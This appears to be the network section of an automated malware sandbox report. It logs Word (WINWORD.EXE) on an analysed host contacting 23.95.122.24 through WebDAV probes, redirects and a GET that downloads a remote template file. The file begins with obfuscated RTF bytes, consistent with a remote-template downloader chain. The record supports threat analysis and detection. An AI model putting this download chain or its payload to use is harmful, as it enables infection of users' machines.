                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 32 33 2e 39 35 2e 31 32 32 2e 32 34 2f 2e 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 5f 2d 2d 2d 2d 2d 2d 2d 2d 2d 5f 2d 2d 2d 2d 2d 2d 2d 5f 2d 2d 2d 2d 2d 2d 2d 2e 2e 2e 2e 2d 2e 2d 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 36 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6a 20 50 48 50 2f 37 2e 33 2e 32 37 20 53 65 72 76 65 72 20 61 74 20 32 33 2e 39 35 2e 31 32 32 2e 32 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://23.95.122.24/..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/">here</a>.</p><hr><address>Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Server at 23.95.122.24 Port 80</address></body></html>
                                                                                                                                                  Apr 8, 2021 13:17:58.160533905 CEST3OUTOPTIONS /..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/ HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                                                                                                                  translate: f
                                                                                                                                                  Host: 23.95.122.24
                                                                                                                                                  Apr 8, 2021 13:17:58.296209097 CEST3INHTTP/1.1 200 OK
                                                                                                                                                  Date: Thu, 08 Apr 2021 11:17:59 GMT
                                                                                                                                                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
                                                                                                                                                  Allow: OPTIONS,HEAD,GET,POST,TRACE
                                                                                                                                                  Content-Length: 0
                                                                                                                                                  Keep-Alive: timeout=5, max=99
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: httpd/unix-directory
                                                                                                                                                  Apr 8, 2021 13:17:59.662621975 CEST4INHTTP/1.1 301 Moved Permanently
                                                                                                                                                  Date: Thu, 08 Apr 2021 11:18:00 GMT
                                                                                                                                                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
                                                                                                                                                  Location: http://23.95.122.24/..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/
                                                                                                                                                  Content-Length: 389
                                                                                                                                                  Keep-Alive: timeout=5, max=98
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 32 33 2e 39 35 2e 31 32 32 2e 32 34 2f 2e 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 5f 2d 2d 2d 2d 2d 2d 2d 2d 2d 5f 2d 2d 2d 2d 2d 2d 2d 5f 2d 2d 2d 2d 2d 2d 2d 2e 2e 2e 2e 2d 2e 2d 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 36 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6a 20 50 48 50 2f 37 2e 33 2e 32 37 20 53 65 72 76 65 72 20 61 74 20 32 33 2e 39 35 2e 31 32 32 2e 32 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://23.95.122.24/..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/">here</a>.</p><hr><address>Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Server at 23.95.122.24 Port 80</address></body></html>
                                                                                                                                                  Apr 8, 2021 13:17:59.795531034 CEST5INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                  Date: Thu, 08 Apr 2021 11:18:00 GMT
                                                                                                                                                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
                                                                                                                                                  Allow: OPTIONS,HEAD,GET,POST,TRACE
                                                                                                                                                  Content-Length: 328
                                                                                                                                                  Keep-Alive: timeout=5, max=97
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 36 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6a 20 50 48 50 2f 37 2e 33 2e 32 37 20 53 65 72 76 65 72 20 61 74 20 32 33 2e 39 35 2e 31 32 32 2e 32 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Server at 23.95.122.24 Port 80</address></body></html>
                                                                                                                                                  Apr 8, 2021 13:18:01.108045101 CEST6INHTTP/1.1 301 Moved Permanently
                                                                                                                                                  Date: Thu, 08 Apr 2021 11:18:02 GMT
                                                                                                                                                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
                                                                                                                                                  Location: http://23.95.122.24/..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/
                                                                                                                                                  Content-Length: 389
                                                                                                                                                  Keep-Alive: timeout=5, max=96
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 32 33 2e 39 35 2e 31 32 32 2e 32 34 2f 2e 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 5f 2d 2d 2d 2d 2d 2d 2d 2d 2d 5f 2d 2d 2d 2d 2d 2d 2d 5f 2d 2d 2d 2d 2d 2d 2d 2e 2e 2e 2e 2d 2e 2d 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 36 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6a 20 50 48 50 2f 37 2e 33 2e 32 37 20 53 65 72 76 65 72 20 61 74 20 32 33 2e 39 35 2e 31 32 32 2e 32 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://23.95.122.24/..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/">here</a>.</p><hr><address>Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Server at 23.95.122.24 Port 80</address></body></html>
                                                                                                                                                  Apr 8, 2021 13:18:01.238528013 CEST7INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                  Date: Thu, 08 Apr 2021 11:18:02 GMT
                                                                                                                                                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
                                                                                                                                                  Allow: OPTIONS,HEAD,GET,POST,TRACE
                                                                                                                                                  Content-Length: 328
                                                                                                                                                  Keep-Alive: timeout=5, max=95
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 36 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6a 20 50 48 50 2f 37 2e 33 2e 32 37 20 53 65 72 76 65 72 20 61 74 20 32 33 2e 39 35 2e 31 32 32 2e 32 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Server at 23.95.122.24 Port 80</address></body></html>
                                                                                                                                                  Apr 8, 2021 13:18:05.619119883 CEST433INHTTP/1.1 302 Found
                                                                                                                                                  Date: Thu, 08 Apr 2021 11:18:06 GMT
                                                                                                                                                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
                                                                                                                                                  X-Powered-By: PHP/7.3.27
                                                                                                                                                  Location: http://23.95.122.24/dashboard/
                                                                                                                                                  Content-Length: 0
                                                                                                                                                  Keep-Alive: timeout=5, max=94
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Apr 8, 2021 13:18:05.745157957 CEST434INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                  Date: Thu, 08 Apr 2021 11:18:06 GMT
                                                                                                                                                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
                                                                                                                                                  Allow: OPTIONS,HEAD,GET,POST,TRACE
                                                                                                                                                  Content-Length: 328
                                                                                                                                                  Keep-Alive: timeout=5, max=93
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 36 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6a 20 50 48 50 2f 37 2e 33 2e 32 37 20 53 65 72 76 65 72 20 61 74 20 32 33 2e 39 35 2e 31 32 32 2e 32 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Server at 23.95.122.24 Port 80</address></body></html>
                                                                                                                                                  Apr 8, 2021 13:18:09.805407047 CEST435INHTTP/1.1 302 Found
                                                                                                                                                  Date: Thu, 08 Apr 2021 11:18:10 GMT
                                                                                                                                                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
                                                                                                                                                  X-Powered-By: PHP/7.3.27
                                                                                                                                                  Location: http://23.95.122.24/dashboard/
                                                                                                                                                  Content-Length: 0
                                                                                                                                                  Keep-Alive: timeout=5, max=92
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Apr 8, 2021 13:18:09.930573940 CEST435INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                  Date: Thu, 08 Apr 2021 11:18:11 GMT
                                                                                                                                                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
                                                                                                                                                  Allow: OPTIONS,HEAD,GET,POST,TRACE
                                                                                                                                                  Content-Length: 328
                                                                                                                                                  Keep-Alive: timeout=5, max=91
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 36 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6a 20 50 48 50 2f 37 2e 33 2e 32 37 20 53 65 72 76 65 72 20 61 74 20 32 33 2e 39 35 2e 31 32 32 2e 32 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Server at 23.95.122.24 Port 80</address></body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  3192.168.2.224917023.95.122.2480C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Apr 8, 2021 13:18:01.397147894 CEST8OUTGET /..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/................................................................................dot HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Host: 23.95.122.24
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Apr 8, 2021 13:18:01.518948078 CEST9INHTTP/1.1 200 OK
                                                                                                                                                  Date: Thu, 08 Apr 2021 11:18:02 GMT
                                                                                                                                                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
                                                                                                                                                  Last-Modified: Wed, 07 Apr 2021 18:00:13 GMT
                                                                                                                                                  ETag: "3263-5bf65b3dc8631"
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Content-Length: 12899
                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Data Raw: 7b 5c 72 74 66 33 31 35 37 26 3f 5e 3a 34 39 39 3f 39 25 a7 37 34 26 b5 30 7e a7 3b 40 3f 21 2e 3f 3e a7 7e 27 36 3a 23 a7 5f 3c 2e 28 38 29 2d 3f 2a 2f 3a 5d 40 36 21 34 27 60 60 39 2e 28 24 34 7c 27 25 3b 21 21 36 7c 35 3f 39 2e 3c 40 3a 3b 2b 5b 5e 7e 23 25 27 7c 5e 3f 2e 2e 5d 35 3d 25 37 37 5e 3a 5f 3c 33 2f 35 3f 3e 7e 3a 3c 2f 38 32 3b 3e b5 3f 3e 3f 35 3c 3f 60 60 5f 7c 7e b5 3e 3e 3f 40 32 27 5f 25 31 3a 3f 33 24 3f 23 24 37 34 23 2b 38 3f 40 3f 37 21 33 3f 3b 3f 34 3f 7c 2c 2c 3f 3b 2f 2f 29 23 25 26 b5 b0 7c 25 3f 30 32 3e 39 3e 7c a7 5f 34 2a 2c 2f 26 5d 39 3f 26 31 2d 21 a7 b5 7c 30 26 b5 40 3f a7 38 38 3f 25 25 3b 3b 28 33 60 38 3f 5b 2a b0 2b 2a 5e 34 26 32 39 7c 25 35 2a 7c 3f 31 7c 25 3d 31 5d 5e 2b 29 28 5b 2c 2d b0 3f 30 5e 40 29 23 3a 2a 35 3f 5e 27 5f 3f 38 5b 39 3f a7 3f 2b 2b 2d 34 21 5f 39 2c b0 25 b0 b0 33 3b 7e 3f 26 24 23 3b 25 3d 36 2b 35 33 7e 3c b0 33 30 7c 34 7c 40 37 27 2f 3d 3a 2d 34 3b 3e 60 27 3a 2c 25 60 30 5b 3f 60 31 3f 2d 3f 3f 3f 2b 3d 3a 5b 3f 2a 3f 2b 36 27 3f 27 3c 7c 31 3f 3a 34 26 3b 2b 3e a7 5e 29 7c 7c 25 35 38 3d 7c 29 b0 34 3c 2e 38 34 3c 2f 27 25 5f 39 33 2c 40 5b 3b 3f 37 30 5b 3f 35 25 b5 3b 21 5b b0 3f 3a 32 7e 2d 36 2d 25 24 3f 5f 3f 36 34 5b 3f 3d 37 2f 3f 3f 3f 3c 39 b5 27 32 7c a7 33 3f 5b 3f 32 3f 3b 21 37 35 2e 2a 5f 3f 37 3f 33 2c 60 27 38 2d 36 3f 3f b5 36 a7 29 b5 29 27 3f 31 3c 3d a7 2e 5d 21 25 39 38 2d 31 3f 24 37 30 25 3f 35 3f 7c 2e 36 7c 24 3d 21 3d 35 21 31 34 24 40 27 b5 25 3e 5d 5b 3f 31 36 33 3f 29 35 2b 2e 35 36 5b 3d 25 34 37 39 5b b5 5d 60 37 27 3a 25 b0 3c 3f 24 2d 38 33 37 7c 3d b0 60 2d a7 3f 33 25 3f 7c 3f 29 2a 21 36 3d 5e 2c 35 3c 3d 3f 7c 5b 29 3e 2a 3d 25 25 7e 38 b0 a7 2f 3b 21 3d 7e 3d 3f 3a 5d 29 35 3e 25 39 26 24 27 21 28 32 2f 32 29 5b 23 40 3b 38 3f 3f 24 38 5e 23 3f 2d 3c 2c 40 3f 3d 3f 3c 39 39 2e 60 38 b5 2e 35 2f 34 60 21 23 40 24 40 3f 2d 38 30 37 2d 28 3f 3f 3a 2a 2e 2e 38 35 27 3f 60 2e 3f 5b 7e 37 25 2d 2f 2a 38 3c 3b 26 35 23 3f 33 32 33 7e 3c 2e 3e 3d 38 27 3b 3f 3f 2d 38 3f 30 3f 33 5e 3f 3f a7 7e 31 2e 25 34 60 b5 3f 24 3f 25 39 a7 3d 3b 7e 35 37 29 b0 5e 3f 24 3a 29 5b b0 37 38 30 2d a7 3f a7 2a 38 b5 31 b5 3e 3f 25 3d 5b 37 23 25 38 3b 2a 60 33 3b 28 30 33 27 b5 38 23 3f 2a 3f 39 3e 39 27 23 30 2d 2c 2b 2f 3d b5 25 3f 2a 26 39 2d 3f 2b 38 7e 2e 31 29 27 2a 33 32 3f 40 3b 60 7e 31 3f 28 32 7e 25 38 5b 3e 5e 29 3f 21 5b 25 2a 33 2f 3f 29 3e 3f 36 23 a7 3b 23 3f 5b 3b 3e b5 2d 3f 2c 3c 2b 32 39 3a 3d 3f 5f 32 25 2b 33 29 35 29 2c 29 a7 3b 39 2a 32 40 2f 33 29 3d 3e 2e 2b 23 a7 33 7c 25 30 2e 5d 33 3c 21 26 5b 2c 7e 2f 36 39 2c 3f b0 3f 5e 30 2c 7e 31 2e 3b 2c 3b 5e 3f 25 3f 25 b5 31 40 5f 7e 40 3f 2d 3f 39 39 7c 5e 31 39 24 23 25 7c 23 5d 3a 2a 2a b5 37 33 37 25 5d 3f 25 3f 2b 2f 29 3f 5b 3f 25 31 33 b0 b0 31 25 31 b0 40 25 2c 27 23 3b 3c 28 3b 21 5b 31 33 3e 25 21 2c 33 2d 2e 21 5b 25 26 27 5d 37 3a 3f 36 35 3b 33 33 7c 5d 3c 3f 30 40 3a 2d 2e 27 32 5e 26 3f 2d a7 3c 2f 3c 27 37 3f 3d 40 3f 24 28 5e 2a 33 33 5d 25 30 3a 32 3f b0 26 5f 3f 21 34 3c b5 b0 5b 27 33 3d 2e 7e 25 35 29 25 24 a7 36 7c 3d 38 28 5e a7 28 21 39 37 32 3f 3e 5d 3e 34 7e 3c 2b 33 7c 2b 3f 30 2e 2a 3c 32 2e 3f 29 2e 3f 3b 7e
                                                                                                                                                  Data Ascii: {\rtf3157&?^:499?9%74&0~;@?!.?>~'6:#_<.(8)-?*/:]@6!4'``9.($4|'%;!!6|5?9.<@:;+[^~#%'|^?..]5=%77^:_<3/5?>~:</82;>?>?5<?``_|~>>?@2'_%1:?3$?#$74#+8?@?7!3?;?4?|,,?;//)#%&|%?02>9>|_4*,/&]9?&1-!|0&@?88?%%;;(3`8?[*+*^4&29|%5*|?1|%=1]^+)([,-?0^@)#:*5?^'_?8[9??++-4!_9,%3;~?&$#;%=6+53~<30|4|@7'/=:-4;>`':,%`0[?`1?-???+=:[?*?+6'?'<|1?:4&;+>^)||%58=|)4<.84</'%_93,@[;?70[?5%;![?:2~-6-%$?_?64[?=7/???<9'2|3?[?2?;!75.*_?7?3,`'8-6??6))'?1<=.]!%98-1?$70%?5?|.6|$=!=5!14$@'%>][?163?)5+.56[=%479[]`7':%<?$-837|=`-?3%?|?)*!6=^,5<=?|[)>*=%%~8/;!=~=?:])5>%9&$'!(2/2)[#@;8??$8^#?-<,@?=?<99.`8.5/4`!#@$@?-807-(??:*..85'?`.?[~7%-/*8<;&5#?323~<.>=8';??-8?0?3^??~1.%4`?$?%9=;~57)^?$:)[780-?*81>?%=[7#%8;*`3;(03'8#?*?9>9'#0-,+/=%?*&9-?+8~.1)'*32?@;`~1?(2~%8[>^)?![%*3/?)>?6#;#?[;>-?,<+29:=?_2%+3)5),);9*2@/3)=>.+#3|%0.]3<!&[,~/69,??^0,~1.;,;^?%?%1@_~@?-?99|^19$#%|#]:**737%]?%?+/)?[?%131%1@%,'#;<(;![13>%!,3-.![%&']7:?65;33|]<?0@:-.'2^&?-</<'7?=@?$(^*33]%0:2?&_?!4<['3=.~%5)%$6|=8(^(!972?>]>4~<+3|+?0.*<2.?).?;~
                                                                                                                                                  Apr 8, 2021 13:18:01.656847000 CEST22OUTHEAD /..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/................................................................................dot HTTP/1.1
                                                                                                                                                  User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                  Host: 23.95.122.24
                                                                                                                                                  Content-Length: 0
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Apr 8, 2021 13:18:01.778624058 CEST22INHTTP/1.1 200 OK
                                                                                                                                                  Date: Thu, 08 Apr 2021 11:18:02 GMT
                                                                                                                                                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
                                                                                                                                                  Last-Modified: Wed, 07 Apr 2021 18:00:13 GMT
